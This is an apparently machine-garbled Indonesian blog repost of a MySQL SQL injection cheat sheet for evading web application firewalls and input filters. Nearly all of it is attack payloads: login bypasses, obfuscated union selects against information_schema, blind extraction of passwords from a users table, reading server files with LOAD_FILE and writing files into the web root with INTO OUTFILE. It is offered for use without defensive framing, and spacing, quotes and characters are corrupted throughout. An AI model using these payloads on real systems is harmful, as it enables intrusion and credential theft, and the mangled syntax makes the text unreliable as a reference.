Master Sql Cheet With Waf sheets

.com/

SQLi filter evasion cheat sheet (MySQL)
Basic filter

Comments
'Or 1 = 1 #
'Or 1 = 1 -
'Or 1 = 1 / * (MySQL <5.1)
'Or 1 = 1;
'Or 1 = 1 union select 1.2 as `
'Or # newline
1 = '1
'Or--newline
1 = '1
'/ *! 50000or * / 1 = '1
'/ *! Hay * / 1 = '1

Prefixes
+ - ~!
'Or - +2 = -!!! '2

Operators
^, =,! =,%, /, *, &, &&, | |, | |,, >>, <=, <=,,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, Least, Greatest , CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL



Whitespaces
% 20% 09% 0a% 0B% 0c% 0d% a0 / ** /
'Or + (1) sounds / ** / like "1" -% a0-
'Union (select (1), tabe_name, (3) from `information_s Chema`. `Tables`) #

Strings with quotes
SELECT 'a'
SELECT "a"
SELECT n'a '
SELECT b'1100001 '
SELECT _binary'1100001 '
SELECT x'61 '

Strings without quotes
'Abc' = 0 × 616263

Aliases
select pass as alias from users
select pass aliasalias from users
select pass `alias alias` from users

Typecasting
'Or true = '1 # or 1 = 1
'Or round (pi (), 1) + true + true = version () # or 3.1 +1 +1 = 5.1
'Or '1 # or true

Compare operator typecasting
select * from users where 'a' = 'b' = 'c'
select * from users where ('a' = 'b') = 'c'
select * from users where (false) = 'c'
select * from users where (0) = 'c'
select * from users where (0) = 0
select * from users where true
select * from users

Authentication bypass '='
select * from users where name = "="
select * from users where false = "
select * from users where 0 = 0
select * from users where true
select * from users

Authentication bypass '-'
select * from users where name = "-"
select * from users where name = 0-0
select * from users where 0 = 0
select * from users where true
select * from users
Function filter

General function filtering
ascii (97)
LOAD_FILE / * foo * / (0 × 616 263)

Strings with functions
'Abc' = unhex (616 263)
'Abc' = char (97,98,99)
hex ('a') = 61
ascii ('a') = 97
ord ('a') = 97
'ABC' = concat (conv (10,10,36), conv (11,10,36), conv (12,10,36))

Strings Extracted from gadgets
collation (\ N) / / binary
collation (user ()) / / utf8_general_ci
@ @ Time_format / /% H:% i:% s
@ @ Binlog_format / / MIXED
@ @ Version_comment / / MySQL Community Server (GPL)
dayname (from_days (401)) / / Monday
dayname (from_days (403)) / / Wednesday
monthname (from_days (690)) / / November
monthname (from_unixtime (1)) / / January
collation (convert ((1) using / ** / koi8r)) / / koi8r_general_ci
(Select (collation_name) from (information_schema.col lations) where (id) = 2) / / latin2_czech_cs

Special characters Extracted from gadgets
AES_ENCRYPT (1.12) / / 4CH ± {? "^ c × HeEEa
DES_ENCRYPT (1,2) / /, / iOk
@ @ Ft_boolean_syntax / / + -> <() ~ *: "" & |
@ @ DATE_FORMAT / /% Y-% m-% d
@ @ Innodb_log_group_home_dir / /. \

Integer representations
false: 0
true: 1
true + true: 2
floor (pi ()): 3
ceil (pi ()): 4
floor (version ()): 5
ceil (version ()): 6
ceil (pi () + pi ()): 7
floor (version () + pi ()): 8
floor (pi () * pi ()): 9
ceil (pi () * pi ()): 10
concat (true, true): 11
ceil (pi () * pi ()) + true: 11
ceil (pi () pi () + version ()): 12
floor (pi () * pi () + pi ()): 13
ceil (pi () * pi () + pi ()): 14
ceil (pi () * pi () + version ()): 15
floor (pi () * version ()): 16
ceil (pi () * version ()): 17
ceil (pi () * version ()) + true: 18
floor ((pi () + pi ()) * pi ()): 19
ceil ((pi () + pi ()) * pi ()): 20
ceil (ceil (pi ()) * version ()): 21
concat (true + true, true): 21
ceil (pi () * ceil (pi () + pi ())): 22
ceil ((pi () + ceil (pi ())) * pi ()): 23
ceil (pi ()) * ceil (version ()): 24
floor (pi () * (version () + pi ())): 25
floor (version () * version ()): 26
ceil (version () * version ()): 27
ceil (pi () * pi () * pi () pi ()): 28
floor (pi () * pi () * floor (pi ())): 29
ceil (pi () * pi () * floor (pi ())): 30
concat (floor (pi ()), false): 30
floor (pi () * pi () * pi ()): 31
ceil (pi () * pi () * pi ()): 32
ceil (pi () * pi () * pi ()) + true: 33
ceil (pow (pi () pi ())-pi ()): 34
ceil (pi () * pi () * pi () + pi ()): 35
floor (pow (pi () pi ())): 36

@ @ New: 0
@ @ Log_bin: 1

! Pi (): 0
!! Pi (): 1
true-~ true: 3
log (-cos (pi ())): 0
-Cos (pi ()): 1
coercibility (user ()): 3
coercibility (now ()): 4

minute (now ())
hour (now ())
(NOW ())
week (now ())
month (now ())
year (now ())
quarter (now ())
year (@ @ timestamp)
CRC32 (true)

Extract substrings
substr ('abc', 1,1) = 'a'
substr ('abc' from 1 for 1) = 'a'
substring ('abc', 1,1) = 'a'
substring ('abc' from 1 for 1) = 'a'
mid ('abc', 1,1) = 'a'
mid ('abc' from 1 for 1) = 'a'
lpad ('abc', 1, space (1)) = 'a'
RPAD ('abc', 1, space (1)) = 'a'
left ('abc', 1) = 'a'
reverse (right (reverse ('abc'), 1)) = 'a'
insert (insert ('abc', 1,0, space (0)), 2,222, space (0)) = 'a'
space (0) = trim (version () from (version ()))

Search substrings
locate ('a', 'abc')
position ('a', 'abc')
position ('a' IN 'abc')
INSTR ('abc', 'a')
SUBSTRING_INDEX ('ab', 'b', 1)

Cut substrings
length (trim (leading 'a' FROM 'abc'))
length (replace ('abc', 'a', "))

Compare strings
strcmp ('a', 'a')
mod ('a', 'a')
find_in_set ('a', 'a')
field ('a', 'a')
count (concat ('a', 'a'))

String length
length ()
bit_length ()
char_length ()
octet_length ()
bit_count ()

String case
ucase
LCase
lower
upper
password ('a')! = password ('A')
OLD_PASSWORD ('a')! = OLD_PASSWORD ('A')
md5 ('a')! = md5 ('A')
sha ('a')! = sha ('A')
AES_ENCRYPT ('a')! = AES_ENCRYPT ('A')
DES_ENCRYPT ('a')! = DES_ENCRYPT ('A')
Keyword filter

Connected keyword filtering
(0) union (select (table_name), column_name, ...
0 / ** / union / *! 50000select * / table_name `foo` / ** / ...
0% a0union% a0select% 09group_concat (table_name) ....
0'union all select all `table_name` foo from `information_schema`. `Tables`

OR, AND
'| | 1 = '1
'&& 1 = '1
'='
'-'

OR, AND, UNION
'And (select pass from users limit 1) =' secret

OR, AND, UNION, LIMIT
'And (select pass from users where id = 1) =' a

OR, AND, UNION, LIMIT, WHERE
'And (select pass from users group by id having id = 1) =' a

OR, AND, UNION, LIMIT, WHERE, GROUP
'And length ((select pass from users having substr (pass, 1,1) =' a '))

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
'And (select substr (group_concat (pass), 1,1) from users) =' a
'And substr ((select max (pass) from users), 1,1) =' a
'And substr ((select max (replace (pass,' lastpw ', ")) from users), 1,1) =' a

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
'And substr (LOAD_FILE (' file '), locate (' DocumentRoo t ', (LOAD_FILE (' file '))) + length (the' ot DocumentRo '), 10) =' a
'= "Into outfile' / var / www / dump.txt

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
'Procedure Analyse () #
'-If (name =' Admin ', 1,0) #
'-If (if (name =' Admin ', 1,0), if (substr (pass, 1,1) = a', 1,0), 0) #

Control flow
case 'a' when 'a' then 1 [else 0] end
case when 'a' = 'a' then 1 [else 0] end
if ('a' = 'a', 1.0)
IFNULL (NULLIF ('a', 'a'), 1)

Enjoy..
PROTOTYPE...

Penulis : Unknown ~ Sebuah blog yang menyediakan berbagai macam informasi

Artikel Master Sql Cheet With Waf sheets ini dipublish oleh Unknown pada hari Friday, December 20, 2013. Semoga artikel ini dapat bermanfaat.Terimakasih atas kunjungan Anda silahkan tinggalkan komentar.sudah ada 0 komentar: di postingan Master Sql Cheet With Waf sheets
 

0 comments:

Post a Comment